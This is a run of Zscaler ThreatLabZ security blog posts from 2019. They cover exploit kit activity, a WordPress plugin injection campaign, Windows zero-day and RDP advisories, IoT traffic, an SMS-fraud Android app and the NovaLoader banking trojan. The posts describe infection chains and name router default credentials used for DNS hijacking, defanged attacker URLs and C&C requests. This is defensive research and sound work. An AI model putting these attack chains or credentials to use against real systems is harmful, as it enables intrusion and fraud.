Security Posts

This is the tenth in a series of quarterly roundups by the Zscaler ThreatLabZ research team in which we collect and analyze the activity of the top exploit kits over the last three months. Exploit kits (EKs) are rapidly deployable software packages designed to leverage vulnerabilities in web browsers and deliver a malicious payload to a victim’s computer. Authors of EKs offer their services for a fee, distributing malware for other malicious actors. What follows are highlights from the EK activity we observed during the last quarter.   RIG EK Rig EK has continued to be active through the quarter. Though EK activity has declined overall, RIG EK activity has been persistent. We saw no changes in the kit behavior as compared to the previous quarter. Below we can see the hits for RIG EK activity. Figure 1: RIG EK hits from 1 March 2019 to 20 May 2019. The geographical distribution of RIG EK hits is shown below. Figure 2: RIG EK heat map showing infection regions One instance of RIG EK activity can be seen below. Figure 3: RIG EK infection cycle The obfuscated JavaScript on the landing page is shown below. Figure 4: RIG EK Landing page Obfuscated JavaScript. We observed the use of two malicious scripts on the landing page, the first one being CVE-2016-0189, which is a Scripting Engine Memory Corruption Vulnerability targeting IE 11 and below. The second script was CVE-2018-8174, which is a Windows VBScript Engine Remote Code Execution vulnerability targeting Windows 10, 7, and 8.1, and Windows Server 2008, 2012, and 2016. We also saw the use of Adobe Flash exploit CVE-2018-4878, which is a use-after-free vulnerability in Adobe Flash Player version 28.0.0.161 and earlier. The snippet of code targeting the CVE-2018-4878 vulnerability can be seen in the decompiled flash file below. Figure 5: Decompiled Flash exploit in RIG EK cycle; CVE-2018-4878 The malware payloads seen with RIG EK this quarter belonged to the SmokeLoader and AZORult families.   Underminer EK Underminer EK is relatively new and we started seeing activity for this EK over the past six months. We see this exploit kit serving its payloads over custom HTTP ports. The recent hits for Underminer EK are shown below. Figure 6: Underminer EK Hits from 1 March 2019 to 20 May 2019.   The geographical distribution of Underminer EK hits is shown below. Figure 7: Underminer EK heat map showing infection regions.   An infection cycle for Underminer EK is shown below. Figure 8: Underminer EK infection cycle   The majority of the activity that we have seen for Underminer EK starts with a malvertising campaign involving a popcash[.]net URL that redirects users to a malicious domain, adpop[.]live. The malicious domain serves content over HTTPS which further redirects the user to the Underminer EK landing page. The call for the Underminer EK on the malicious domain adpop[.]live is shown below. Figure 9: Underminer EK landing page call on malvertisement page   This landing page contains a call to the malicious SWF payload. This call can be seen in the screenshot below. Figure 10: Underminer EK call for Flash exploit   The malware payload seen in this cycle was a bootkit Trojan.   Spelevo EK We started seeing activity for a new exploit lit called Spelevo in March 2019. Spelevo EK authors integrated the relatively new Flash Exploit CVE-2018-15982. The hits for Spelevo EK activity are shown below. Figure 11: Spelevo EK Hits from 1 March 2019 to 20 May 2019   The geographical distribution of Spelevo EK hits is shown below. Figure 12: Spelevo EK heat map showing infection regions   An infection cycle for Spelevo EK is shown below. Figure 13: Spelevo EK infection cycle   The image below shows the Spelevo EK malvertisement redirect to the EK landing page. Figure 14: Spelevo EK malvertisement redirect   Spelevo EK landing page contains an obfuscated JavaScript Browser Plugin Detect script to determine the Adobe Flash player version that the user's system is running. The obfuscated JavaScript along with the decoded script is shown in the image below. Figure 15:  Spelevo EK landing page and deobfuscated browser plugin detect JavaScript   The same page serves a redirect URL based on the conditions met. Figure 16: Spelevo EK Flash Player plugin detect   Once the Adobe Flash version is found to be vulnerable, the user is served a malicious SWF file which is a use-after-free vulnerability (CVE-2018-15982) in Adobe Flash Player versions 31.0.0.153 and earlier. The cycle did not serve any malware payload on our test machine but malware activity have been reported on successful exploitation in the wild.   Other exploit kits We also observed some exploit kit activities directed towards routers and focused on hijacking DNS queries. A snippet of scan code served by a router exploit kit is shown below. Figure 17: Scan script served by a router exploit kit   Based on the target IP addresses seen online, the script then calls another obfuscated malicious JavaScript; a sample script served by such an exploit kit can be seen below. Figure 18: Obfuscated JavaScript on a router exploit kit landing page   A Base64 decoded version of the landing page shows the DNS hijacking script below. In this screenshot we see the script trying to target the gateway IP with default credentials. In this case, the script is attempting to log in with user name "admin" and an empty password. If the attempt is successful, the DNS address is modified to the attacker's DNS address (158.255.7[.]150) along with a backup legitimate public DNS address (8.8.4[.]4). Figure 19: Base64 decoded JavaScript showing the DNS hijacking configuration   Another instance of a default credential being used to target routers is shown below. Figure 20: Default credentials being targeted by router exploit kits   Here we see password "gvt12345" being used along with the username "admin." A quick Google search for this password pattern reveals that this might have been used as default password by a few Brazilian ISPs and has been used before in similar attacks. Checking the name resolution using the attacker's DNS server shows the DNS redirect behavior in action, as shown below. Figure 21:  DNS resolution using the attacker’s DNS server shows name resolution to a phishing IP   In this case, the server IP resolved by the DNS server for www.google[.]com is a malicious server that is controlled by the attacker and used to serve phishing content to victims. GrandSoft EK, Magnitude EK, and Fallout EK did not show changes during the quarter. We did not see activity this quarter for other recent exploit kits such as Terror EK, KaiXin EK, and Disdain EK.   Conclusion This quarter we saw the addition of Spelevo and Underminer to the exploit kit threat landscape, and we saw some EK activity targeting routers. Exploit kits are effective, as they can infect a victim's machine during web browsing without the user's knowledge. The attackers monetize the successful infections in a variety of ways, such as by collecting a ransom for retrieving data encrypted by ransomware, mining cryptocurrencies using the victim's system resources, or installing banking Trojans to steal a victim's identity. Attackers frequently change their techniques by obfuscating the source code or integrating new exploit codes into their EKs, and security researchers analyze and block the new threats by tracking changes in the EK behavior.   To help avoid infections from exploit kits, users should always block untrusted third-party scripts and resources, and avoid clicking on suspicious advertisements. Keeping browser plugins and web browsers up to date with the latest patches helps to protect against common vulnerabilities targeted by exploit kits. The Zscaler ThreatLabZ research team has confirmed coverage for these top exploit kits and subsequent payloads, ensuring protection for organizations using the Zscaler cloud security platform.  

WordPress is by far the most popular content management system (CMS) and, because of its wide usage, it is also popular among cybercriminals. Most of the WordPress sites that have been compromised are the result of attackers exploiting vulnerable versions of the plugins used. A stored cross-site script vulnerability was discovered last week in the popular WordPress Live Chat Support plugin. The vulnerability allows an unauthenticated attacker to update the plugin settings by calling an unprotected "admin_init hook" and injecting malicious JavaScript code everywhere on the site where Live Chat Support appears. All versions of this plugin prior to version 8.0.27 are vulnerable. The patched version for this vulnerability was released on May 16, 2019,  and has been fixed for version 8.0.27 and higher. ThreatLabZ researchers recently discovered what may be the first campaign in which attackers are exploiting the Live Chat Support plugin vulnerability and injecting a malicious script that is responsible for malicious redirection, pushing unwanted pop-ups and fake subscriptions. While it is not yet seen as a widespread attack, the number of compromised websites is growing (at the end of this blog there is a link to the names of the compromised sites). Fig 1: Hits of the compromised WordPress sites Fig 2: WordPress site using a vulnerable version of the Live Chat Support plugin   Fig 3: Obfuscated script injected in the compromised WordPress site   Fig 4: Deobfuscated version of the injected script   The injected script sends a request to the URL hxxps://blackawardago[.]com to execute the main script. Fig 5: Request and response to the hxxps://blackawardago[.]com   After the execution of the above script, the victim is redirected to multiple URLs, mainly related to pushing unwanted popup ads and fake error messages. Fig 6: Highlighted (red) multiple redirected URLs after the execution of the malicious script.   Fig 7: Popups after execution of the malicious script   The domain that hosts the malicious script is a newly created domain hosted on a dedicated IP address. Fig 8: Whois information of the domain   Conclusion Cybercriminals actively look for new vulnerabilities in popular content management systems such as WordPress and Drupal, as well as popular the plugins that are found in many websites. An unpatched vulnerability in either the CMS or associated plugins provides an entry point for attackers to compromise the website by injecting malicious code and impacting the unsuspecting users visiting these sites. It is critical for website owners to apply the security update if they are using the vulnerable plugin, particularly because it is a pre-auth vulnerability and can lead to widespread compromise. The Zscaler ThreatLabZ team is actively tracking and reviewing all such malicious campaigns to ensure that our customers are protected.   IOCs blackawardago[.]com 216[.]10[.]243[.]93 List of compromised sites is available here.

Background A security researcher (with the pseudonym SandboxEscaper) has discovered three zero-day vulnerabilities in Microsoft Windows. Their POC and source code have been released on GitHub. Two of these are local privilege escalation (LPE) vulnerabilities. They have been tested to work on Windows 10 only. The third vulnerability is a sandbox bypass vulnerability in Internet Explorer 11 (IE11). As of this writing, no patch has been released by Microsoft for these vulnerabilities.   What is the issue? The security researcher has published three POCs: angrypolarbearbug2, bearlpe, and sandboxescape.  The first vulnerability – angrypolarbearbug2 – can be exploited by performing specially crafted DACL (discretionary access control list) operations when the Windows Error Reporting service tries to write a DACL for the given Windows Error Reporting (.wer) file. Once successfully exploited, the vulnerability gives SYSTEM privileges to the attacker. The second vulnerability – bearlpe – targets the way the Windows task scheduler service uses the SetJobFileSecurityByName() function to write DACL for the job file. For this exploit to work, one needs to have "schtasks.exe" and "schedsvc.dll" files from Windows XP. Once successfully exploited, the vulnerability gives SYSTEM privileges to the attacker. The third vulnerability – sandboxescape – bypasses the IE11 sandbox and allows an attacker to execute code in IE low protection mode. To exploit this vulnerability, an attacker needs to inject a special DLL in the IE process. According to reports, this exploit cannot be triggered remotely.   What systems are impacted? The POC has been tested on Windows 10 32-bit and 64-bit and IE11.   Zscaler coverage Advanced Threat Signatures: Win32.Exploit.Bearlpe  Win32. Exploit.CVE.2019.0863 Win32.Exploit.Polarbearescape W32/Agent.NBHI Zscaler Cloud Sandbox provides proactive coverage against exploit payloads and advanced threats like ransomware, and the Zscaler ThreatLabZ team is actively monitoring for in-the-wild exploit attempts to ensure coverage.

Do you know exactly what IoT devices are on your network and how active they are? You’d better, because they might be opening the door to cybercrime. IoT devices are, of course, nonstandard computing devices that connect wirelessly to a network and have the ability to transmit data. These devices can communicate and interact over the internet, and they can be remotely monitored and controlled. Connected devices are part of a scenario in which every device talks to other related devices in an environment to automate home and industrial tasks, and to communicate usable sensor data to users, businesses and other interested parties. IoT devices are meant to work in concert for people at home, in industry, or in the enterprise. Enterprises around the globe have been adopting the use of IoT products to improve organizational efficiency, enhance communications, and to gain insight into system performance. According to Gartner, 20.4 billion IoT devices will be in use worldwide by 2020, and more than 65 percent of enterprises will adopt IoT products. That translates to quite a bit of budget being dedicated to these devices. IDC has predicted that IoT spending will reach $745 billion in 2019 and surpass the $1 trillion mark in 2022. That’s a 15 percent increase over 2018’s $646 billion. According to the same report, the U.S. and China will be spending the most at $194 billion and $182 billion, respectively. They are followed by Japan, Germany, Korea, France, and the UK.   Analyzing IoT transactions To help organizations get a better understanding of IoT activity in the enterprise, the ThreatLabZ research team analyzed IoT traffic across the Zscaler cloud during a one-month period between March and April 2019. The analysis looked at the types of devices in use, the protocols they used, the locations of the servers with which they communicated, and the frequency of their inbound and outbound communications, as well as IoT traffic patterns. The report, titled IoT in the Enterprise: an analysis of traffic and threats, provides a general overview of the most frequently seen device categories, then takes a deep dive into the transaction data for specific types of IoT devices. It also explores some of the security concerns around IoT devices, including the use of plain-text channels and the threat of malware.   Emerging threats The rapid adoption of these IoT devices has opened up new attack vectors for cybercriminals. And, as is often the case, IoT technology has moved more quickly than the mechanisms available to safeguard these devices and their users. Researchers have already demonstrated remote hacks on pacemakers and cars. And, in October 2016, a large distributed denial-of-service (DDoS) attack, dubbed Mirai, affected DNS servers on the east coast of the United States, disrupting services worldwide. This attack was traced back to hackers infiltrating networks through IoT devices, including wireless routers and connected cameras. In August 2017, the U.S. Senate introduced the IoT Cybersecurity Improvement Act, a bill addressing security issues associated with IoT devices. While it is a start, the bill only requires internet-enabled devices purchased by the federal government to meet minimum requirements, not the industry as a whole. However, it is being viewed as a starting point that, if adopted across the board, could pave the way to better IoT security industry-wide. One of the ThreatLabZ team’s discoveries was that the vast majority of IoT transactions were occurring over plain text channels, instead of the more secure SSL-encrypted channels. While a major security vulnerability, the use of unsecured channels is just one vulnerability with IoT devices. They are notorious for weak, preset passwords that often go unchanged.   Malware in IoT traffic As with just about every device connected to the internet, malware is also a threat to IoT devices. Each quarter, the Zscaler cloud blocks approximately 6,000 transactions from IoT-based malware and exploits. And, earlier this year, the Zscaler ThreatLabZ team analyzed certain threats that were targeting IoT devices. The fact is that there has been almost no security built into the IoT hardware devices that have flooded the market in recent years, and there’s typically no way to easily patch these devices. While many businesses have thought security for IoT devices unnecessary because nothing is stored on the devices, this isn’t the case. The Mirai botnet attack illustrated how exposed companies can be as a result of their IoT devices. Even though these devices continue to be an easy target for cyberattacks, enterprises can take steps to reduce the risk: Change default credentials to something more secure. As employees bring in devices, encourage them to be sure their passwords are strong and their firmware is always up to date. Install IoT devices on isolated networks (to prevent lateral movement), with restrictions on inbound and outbound network traffic. Restrict access to the IoT device as much as possible from external networks. Block unnecessary ports from external access. Apply regular security and firmware updates to IoT devices, in addition to securing the network traffic. Finally, deploy a solution to gain visibility of the shadow IoT devices that are already sitting inside the network and ensure above safeguards.   Advanced security for IoT devices IoT devices have become commonplace in enterprises from all industries and in nearly every corner of the globe. These devices were designed to help improve efficiency and expand communications, and organizations continue to explore new ways to incorporate these devices into everyday operations. Of course, many of the devices are employee-owned, and this is just one of the reasons they are a security concern. With all of these new connected devices, and the enormous amounts of associated data traversing your network and opening up new attack vectors for cybercriminals, can you trust your legacy network to provide adequate security? The security of your enterprise hinges on your answer. Read the entire report, IoT in the Enterprise: an analysis of traffic and threats. I’d like to thank our Sr. Security Researcher Viral Gandhi for his help in compiling the report. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  Deepen Desai is VP of Security Research at Zscaler

Background Earlier today Microsoft released several security updates as part of its regular monthly updates known as Patch Tuesday. One of the issues that was patched in today's update, CVE-2019-0708, is critical, and all Windows users should apply the patches immediately, regardless of whether or not they are running the vulnerable operating system. Large organizations following 15/30/60-day patch cycles should consider making an exception and applying the patches as soon as possible, especially if running one of the vulnerable operating systems.   What is the issue?  CVE-2019-0708 is a remote code execution vulnerability in Microsoft Windows Remote Desktop Services that affects several older versions of the Windows operating system. What makes this vulnerability unique, and alarming, is that an attacker attempting to exploit the vulnerability does not have to be authenticated to the target machine and needs no interaction from the target user for the machine to be compromised. In other words, this can and most likely will be exploited by malware authors to spread payloads rapidly, from unpatched system to unpatched system. There have been no exploitations detected yet, but this is the type of vulnerability that could lead to another attack like WannaCry, which caused massive disruptions in organizations around the world in May 2017.   What systems are impacted? Windows XP, Windows 2003, Windows 7, Windows Server 2008 R2, and Windows Server 2008 operating systems are vulnerable. Windows 8 and Windows 10 operating systems are NOT vulnerable.   What can you do to protect yourself? Microsoft has been proactive in releasing security updates for the unsupported operating systems, given the critical nature of this vulnerability. Apply the security updates released by Microsoft immediately from the following locations: For supported operating systems: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0708#ID0EGB   For unsupported end-of-life operating systems [Windows XP and 2003]: https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708     Zscaler coverage Zscaler Cloud Sandbox provides proactive coverage against worm payloads and advanced threats like ransomware, and the Zscaler ThreatLabZ team is actively monitoring for in-the-wild exploit attempts to ensure coverage.  

As a society, we are more connected than ever before. Our community is no longer just the people living nearby. It is now a global community, made up of disparate individuals connected not by proximity but by the internet. As in almost any community, crime is a factor. In today’s digital society, that means cybercriminals, and they seem to be launching new attacks every day. These cybercriminals have gone from lone hackers to sophisticated criminal organizations, launching attacks on individuals, corporations, and governments. As these criminals have become more organized, the challenge in fighting them has become more difficult. If the cybercriminals are working together to increase their chances of success, it makes sense that those who fight these bad actors should also work together. Today, Verizon released its 2019 Data Breach Investigations Report, and I am proud that the Zscaler ThreatLabZ team once again actively contributed to the findings in this report. The Verizon 2019 Data Breach Investigations Report takes an in-depth look at security incidents and data breaches that occurred in 2018. The report analyzes 41,686 security incidents, of which 2,013 were confirmed data breaches. It looks at how the results have or have not changed over the years and digs into the overall threat landscape and the actors, actions, and assets that are present in breaches. The report delves into security incident patterns and describes how they correlate to the various industry verticals. In addition to these primary patterns, the report includes a subset of data to pull out financially motivated social engineering (FMSE) attacks, which are more focused on credential theft and duping people into transferring money into adversary-controlled accounts. Among the findings, the report revealed that 43 percent of data breaches occurred at small businesses, which tend to have less stringent security than larger organizations, making them an easier target. The most common tactic used in breaches was hacking (52 percent of the time), while errors (21 percent) and misuse by authorized users (15 percent) also led to breaches. And, as can be expected, financial gain was the most common motivation (71 percent). These results, and the others detailed in the report, are based on data collected from a variety of sources, including publicly disclosed security incidents, cases provided by the Verizon Threat Research Advisory Center (VTRAC) investigators, and external collaborators, such as ThreatLabZ. The year-to-year data includes new sources of incident and breach data as more organizations share information to improve the diversity and coverage of real-world events. The number of organizations providing data continues to grow, with 66 organizations external to Verizon now contributing to this report. This community of data contributors represents an international group of public and private entities that understand the importance of sharing information to gain a better understanding of the threats we all face on a daily basis. This is the second consecutive year that Zscaler has provided transaction data for the report. The ThreatLabZ team examined transactions processed in the Zscaler cloud during 2018, specifically looking for attempted phishing attacks and blocked malware. We also offered insights into each threat category with supporting telemetry information indicating the number of users affected by these security incidents and data breaches. It is heartening to see so many organizations coming together to share information in an ongoing effort to secure the internet and this digital world in which we all participate. Unfortunately, cybercriminals will continue developing new threats and attack methods, as long as there’s a potential payoff. And, since there is no sign of attackers stopping any time soon, it is up to all of us working in the cloud and cybersecurity industries to work together to make their job a lot more difficult. I think Gloria Macapagal Arroyo, the 14th President of the Philippines, said it very well: “The power of one, if fearless and focused, is formidable, but the power of many working together is better.” Download the entire Verizon 2019 Data Breach Investigations Report. Read more from the ThreatLabZ team. Read about Zscaler cloud security here. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Deepen Desai is vice president of security research at Zscaler 

In lieu of downloading and installing apps from the official Android app store, users often turn to third-party stores. The reasons vary, from wanting a particular app that isn’t available on the official store to seeking cracked apps—versions that have been modified to disable certain features, such as copyright protections—of official Android apps. Recently, the ThreatLabZ research team came across one of these third-party app stores that seemed to be hosting Android games. The store, called “Smart Content Store,” portrays itself as an Android app store and uses names such as sexy.smartcontentstore[.]com and games.smartcontentstore[.]com.     Fig 1: Third-party app store homepage   At first glance, the site appears to be an app store hosting Android games, but we were unable to download any apps. Clicking the Install option on any of the games, as seen in screenshot above, leads back to the same page.   Upon further examination, we found many direct links to APKs being downloaded from these domains. The image below shows the direct downloads of these APKs.   Fig 2: Zscaler dashboard   These apps have different package names and certificates, but every app exhibits the same functionality. We have provided an analysis of one of the apps below. (A complete list of apps can be found in the IOC at the end of blog.)   App summary APK Name: smartworld_-_WIN_-_500929091890143_-_.apk Package name: vaya.bailecito.epore.saturda Size: 2100203 bytes MD5: 091E91A9ED7202CD44DC5E1C4B3DCC90 Technical details As soon as the app is installed, it appears as a blank space. As shown in the screenshot below, the app icon and app name are missing. Upon clicking the space (the invisible icon) the app displays its first activity with two options: Smart World and Sexy World.     Fig 3: Invisible app icon and the first activity   During the initial phase, the app sends several requests to hxxp://play4funclub[.]com/public/notification/is-active, but during our analysis, we just received 301-Moved Permanently in response. These requests can be seen in the screenshot below.    Fig 4: Initial requests    Upon clicking either of the two options shown above, Smart World or Sexy World, the app asks for Administrator privileges, stating "To view all the porn videos you need to update. Click to activate.” This message can be seen in the screenshot below (left image).   Fig 5: Admin privileges   As soon as the victim activates admin rights, a request is sent to another domain. Nothing happened as a result of this request, so we believe that it is simply an indication to the attacker whether the victim has activated admin rights or not.    Fig 6: Request upon enabling admin rights   After a certain amount of time passes, the app starts sending requests to hxxp://app.in-spicy[.]com/scripts/app_sms_request_get_number.php with details about the victim's device and location. It sends the following information in its POST request: Android version Installation date Version Date (Date of request)  Country code Carrier  Device ID The screenshot below shows the request and response taking place between the compromised device and attacker:   Fig 7: Request and response related to the SMS message   The app acts according to the response received from the attacker’s domain. If the response contains "status":"OK", the app fetches the desired details from the response. In our case, it was a phone number and message body. Further, it sends an SMS message to that specific number and message body. This functionality is visible in the screenshot below where the response from the attacker is contained in paramJSONObject and is based on the response, sendTextMessage; this response initiates a routine that sends actual SMS messages.   Fig 8: Sending SMS functionality   During this phase of analysis, we observed several attempts to send SMS messages to different phone numbers with different text as the message body. This can result in high costs to the victim. Some examples of the SMS messages can be seen in the table below: Phone # Message Body 6768482371 message:france athletes employed 6857215675 message:experience iran yarn combines field 6768482371 message:luther exercise queens 2347003300131 message:hungary contributing task bird 6857215675 message:boolean wisconsin criticism verification republic 2347003300131 message:exchange audience nc medicaid 2347003300131 message:ut controlled salt customized consider 6768482371 message:legislative wayne brand hungarian 6768482371 message:consulting gui contrary eclipse 79697530171 message:boards tits difficulties 6768482371 message:royalty relay mv 6768482371 message:boards sie gabriel computer 6768482371 message:mods html chronic 6768482371 message:integer coleman monsters 6745596671 message:capabilities labels addiction 6768482371 message:checking upskirt football possibilities 6745596671 message:academics actively matrix ga 2347003300131 message:incidence quality mrs estimated default 6745590060 message:estate mexican legal flour 6768482371 message:cleared connectivity divx 2347003300131 message:cafe activists our constantly 6745596671 message:brush accepted role 6745596671 message:plain weed senators reform framing 6745596671 message:represents fig answers signup 6745596671 message:animation failure lucas browser poetry 2347003300131 message:biodiversity present solving herbal regulations 6857215675 message:shakira wanna movie freight 6768482371 message:shipping uzbekistan senators optimize basically 6857215675 message:folks tamil cooper 6857215675 message:picking maine shapes men wives   This app also has permission to view the victim’s contact list, which means the app can easily spread itself using those contacts. We also found other high-level permissions and we are analyzing the sample further to determine their functions and potential impact. We will update this report with any interesting findings.   Conclusion The Zscaler Cloud Sandbox successfully flagged the sample as malicious based on indicators found in the sample, as shown in the report screenshot below.   Fig 9: Zscaler Cloud Sandbox   Zscaler advises Android users to download apps only from official app stores. Using third-party stores may lead to the installation of apps that have hidden, malicious intentions, as described in this case. We also advise users to keep the Unknown Sources option off at all times on your Android device. Keep this off will prevent any third-party app to directly get installed on the device.    IOCs Domains app.in-spicy(dot)com insidecontentsp(dot)com incontsmart(dot)com   MD5 044b97016fdcd22c8c2211014e65c562 bb5a4cea098a29ac8533c561784908b4 58f237f346d81385eaa2005cd642e28c f50091fbe2fef0c9501f242afb356c96 2cbf13b90b76300f9668c2660b9cbc35 5c68ff95c2278da0fcc13b4c46f7978b 091e91a9ed7202cd44dc5e1c4b3dcc90 88c2ccec249ff6df0fd525e09e700861 8ac5e78f4bc7212fcadd805c924ba67c eaa2f149f33e35906095857064721044 60772ad9808a5bab595f3459e8d5bb4c 9f4ff0d5425f1542fe4aef50cb1b20dd 64d5bba5e3a18f971ee5904ccc9b7826 20614d2d2471b2a7fcfbbf67f0fdbfb6 6f31a49153b6b504ce8804c91113852f d717c2c4ebce47d40aea491e911b1c5d 3124ae1a165d2fd1f5ab4e6b83a1100a 4f3289108728c33866e62e99a1fed40d 1a027810c28fad34c7590ddb18dc6a51 4fd81f83d8cb40f6fb0bd1ad94b8ea7f 32131606ac4448683dad9148e4754f81 afe96ae477648b152e7434ac5c0790c6 793fc48a4947a3c19efc570ba8af1235 62ff00af19ad0ed02ab65f3d8a6ceb27 61d9506df0a016435297829bb386e4b8 61ded4d4c3268c354a794dc4c6dea530 81685083658d7e839e68489391f15a05 2bcc9865edb66883b82f43c34e6ac19d a8a75b3055a9aa27a26d326061173287 8dbbcdfa3d4d1207e325890680f98d4a 58271be93858eb5baeaa401fe1d583bb a350e8b88d586e26e9dc858c83407ebc a5219ee0c3c10ca8db991d05fe34b9b0 ca17d9260a247e6457876a2f98e3fab7 064a46635c0bda86bcc42ae484ee5c25 874e3af735b6e17ddd596c29e2fc55d5 cfe0d20dbf674f8619584c850eda2186 0cadfdf04df0f3dba0e8a0fdb087993b dada3ef23b89c9e0f535aa7dd49360e1 b34d3dbd6241f63670e010f7da05630b 43a70f5f1929e882894a023a67ffe23f 00b9c19f229892ad6f0c45f75a5bf729 154ee512e7142f56118209ec9375433d 4cd7745e9f0043ed3da046f88249b221 1efefb04a779b5cd7ccfc1aa4b104fc1   22b5cec87a9227abbaa6f120f4809230   0648e6c78d85ce62eed06fbb94283712

As part of our daily threat tracking activity, ThreatLabZ researchers recently came across an interesting Brazilian banking malware campaign. The malware, NovaLoader, was written in Delphi and made extensive use of Visual Basic Script (VBS) scripting language. Although the final payload was not entirely new and has been discussed by other security researchers, we found that the multi-stage payload delivery was unique.   Delivery method In earlier documented campaigns, the delivery methods for this malware included spam, social engineering, and fake sites for popular software such as Java. The malware operators use a variety of available options to ensure malware delivery and try to avoid detection by security products. They often do so by abusing popular legitimate services like Dropbox, GitHub,  Pastebin, AWS, GitLab, and others, as well as URL shorteners and dynamic DNS services such as No-IP and DynDNS. NovaLoader is known to use AutoIt, PowerShell, and batch scripts in the infection chain, but this is the first time we have seen it use VBS. In this campaign, it is also using encrypted scripts instead of simply obfuscated ones. Fig.1: NovaLoader Infection flow   Main Dropper MD5: 4ef89349a52f9fcf9a139736e236217e The main dropper is very simple; its only purpose is to decrypt the embedded VB script and run the decrypted script.   Fig. 2: Stage 1 VB script decryption loop   Stage 1 Script Embedded script before and after decryption: Fig. 3: VB script before and after decryption This VBS file will decrypt a URL (dwosgraumellsa[.]club/cabaco2.txt) to download another encrypted script and run that after decryption. D Fig. 4: Download request for the next stage, an encrypted payload   Stage 2 Script Downloaded VB script looks like the following after decryption: Fig. 5: VBS after decryption The VB script will send a GET request to “http://54.95.36[.]242/contaw.php” , possibly to let the command-and-control (C&C) server know that it is running on the system. After that it will try to detect presence of virtual environment using Windows Management Instrumentation (WMI) queries, as shown below. Fig. 6: VM detection code NovaLoader will drop and copy following executable files into the directory C:\\Users\\Public\\: C:\\Windows\\(system32|SysWOW64)\\rundll32.exeC:\\Windows\\(system32|SysWOW64)\\Magnification.dll Fig. 7: C&C notification request After that it will download a following files from 32atendimentodwosgraumell[.]club 32atendimentodwosgraumell[.]club/mi5a.php decrypted and saved at C:\Users\Public\{random}4.zip32atendimentodwosgraumell[.]club/mi5a1.zip saved at C:\Users\Public\{random}1.zip32atendimentodwosgraumell[.]club/mi5asq.zip saved at C:\Users\Public\{random}sq.zip Then it will send multiple GET requests to “54.95.36.242/contaw{1-7}[.]php” Fig. 8: Multiple C&C requests GET /contaw.php GET /contaw2.php?w={redacted}BIT-PC_Microsoft%20Windows%207%20Professional%20_True GET /contaw3.php?w={redacted}BIT-PC GET /contaw4.php?w={redacted}BIT-PC GET /contaw5.php?w={redacted}BIT-PC GET /contaw6.php?w={redacted}BIT-PC_2/1/2019%205:05:06%20PM GET /contaw7.php?w={redacted}BIT-PC_2/1/2019%205:05:06%20PM_CD=414KbCD1=9160Kb_ It will also drop several files into the C:\Users\Public\ directory: Dropped files MD5 Comment DST.exe 51138BEEA3E2C21EC44D0932C71762A8 copied rundll32.exe I 3DC26D510907EAAC8FDC853D5F378A83 encypted file containing various values like version, extension etc. I_ A34F1D7ED718934185EC96984E232784 encrypted configuration file KC 89473D02FEB24CE5BDE8F7A559631351 similar to file named "I" mwg.dll F3F571288CDE445881102E385BF3471F copied magnification.dll PFPQUN.DST 8C03B522ACB4DDC7F07AB391E79F1601 support dll to decrypt main payload PFPQUN1.DST F3D4520313D05C66CEBA8BDA748C0EA9 encrypted main payload winx86.dll 87F9E5A6318AC1EC5EE05AA94A919D7A Sqlite dll Fig. 9: Files dropped by script And, finally, it will execute the decrypted DLL exported function using the copied rundll32.exe file. Fig. 10: Executing the stage-3 payload The stage-3 payload is a DLL file that acts as a loader for the final payload. It is run via rundll32.exe and its purpose is to decrypt and load the final payload.   Final payload The final payload is written in Delphi. It has multiple capabilities including stealing victim's credentials for several Brazilian banks. It monitors the browser window’s title for bank names and if a targeted tab is found, the malware can take control of the system and block the victim from the real bank's page to do its nefarious activities by communicating to its C&C. Its activity is quite similar to the well-known Overlay RAT. Some of the interesting commands used by the malware include: Command String Description To stabilize socket connection Sends infected OS details Checking status of the connection Close all connections Sends keystrokes to the active application window Set mouse position Set mouse left button down Set mouse left button up Set mouse right button up Set mouse right button down Share compromised system desktop Check gets in C&C response to check if data is correct reply with Fig. 11: NovaLoader C&C commands There were many interesting strings related to the Brazilian banks found in malware: Strings in malware Corresponding bank site caixa http://www.caixa.gov.br bancodobrasil https://www.bancobrasil.com.br bbcombr https://www.bb.com.br/ bradesco https://banco.bradesco/ santander https://www.santander.com.br/ bancodaamazonia https://www.bancoamazonia.com.br/ brbbanknet https://brbbanknet.brb.com.br/netbanking/ banese https://www.banese.com.br/ banestes https://www.banestes.com.br/ bancodoestadodopar https://www.banpara.b.br/ bancobs2 https://www.bs2.com/ citibankbrasil https://www.citibank.com.br bancofibraonline https://www.bancofibra.com.br/ agibank https://www.agibank.com.br/ bancoguanabara http://www.bancoguanabara.com.br/ ccbbrasil http://www.br.ccb.com bancoindusval https://www.bip.b.br/ir internetbankingbancointer https://internetbanking.bancointer.com.br/ modalbanking https://modalbanking.modal.com.br/ bancopan https://www.bancopan.com.br/ pineonline https://www.pine.com/ Fig. 12: Some of the targeted bank strings found in the malware   Conclusion The Brazilian actors are among the top contributors of global cybercrime and they are always coming up with new ways to infect their targets using spam, social engineering, and phishing. In this campaign, we have observed them targeting Brazilian financial institutions using malware written in Delphi. The Zscaler ThreatLabZ team is actively tracking and reviewing all malicious payloads to ensure that our customers are protected.   IOCs Md5 60e5f9fe1b778b4dc928f9d4067b470b 4ef89349a52f9fcf9a139736e236217e 100ff8b5eeed3fba85a1f64db319ff40 99471d4f03fb5ac5a409a79100cd9349 cb2ef5d8a227442d0156de82de526b30 a16273279d6fe8fa12f37c57345d42f7 ac4152492e9a2c4ed1ff359ee7e990d1 fdace867e070df4bf3bdb1ed0dbdb51c 4d5d1dfb84ef69f7c47c68e730ec1fb7 6bf65db5511b06749711235566a6b438 c5a573d622750973d90af054a09ab8dd ef5f2fd7b0262a5aecc32e879890fb40 35803b81efc043691094534662e1351c 34340c9045d665b800fcdb8c265eebec a71e09796fb9f8527afdfdd29c727787 5a9f779b9cb2b091c9c1eff32b1f9754 a7117788259030538601e8020035867e cb9f95cec3debc96ddc1773f6c681d8c a7722ea1ca64fcd7b7ae2d7c86f13013 URLs 185[.]141[.]195[.]5/prt1.txt 185[.]141[.]195[.]81/prt3.txt 185[.]141[.]195[.]74/prt1.txt dwosgraumellsa[.]club/cabaco2.txt wn5zweb[.]online/works1.txt 23[.]94[.]243[.]101/vdb1.txt 167[.]114[.]31[.]95/gdo1.txt 167[.]114[.]31[.]93/gdo1.txt

